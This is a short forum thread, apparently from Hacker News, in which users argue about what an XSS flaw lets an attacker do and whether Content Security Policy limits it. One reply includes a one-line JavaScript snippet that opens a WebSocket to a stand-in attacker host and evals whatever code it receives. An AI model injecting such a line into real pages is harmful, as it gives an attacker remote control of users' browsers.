[rainonmoon]

Show me where you can "open a tunnel" using the XSS in this post.

> Anything the user can do, you can do via an XSS attack.

I just explained why this isn't a reasonable assumption. You seem to have multiple fundamental misunderstandings about web application security so I don't think it's constructive for either of us to continue this conversation.

[llmslave2]

> Show me where you can "open a tunnel" using the XSS in this post.

   new WebSocket("ws://evil.com").addEventListener("message", e => eval(e.data))

> You seem to have multiple fundamental misunderstandings about web application security

Lol yeah sure buddy

[rainonmoon]

Go to Discord and paste that into your console. None of us will hold it against you if you come back and delete these comments once you learn about Content Security Policy.

[zahlman]

> Go to Discord and paste that into your console.

The same Discord that configures things so that any time you open the console it greets you with a giant message warning you not to paste anything into the console?

[llmslave2]

Maybe you should read up on what CSP can and can't do. Once an attacker can execute arbitrary code, they can do anything the client can.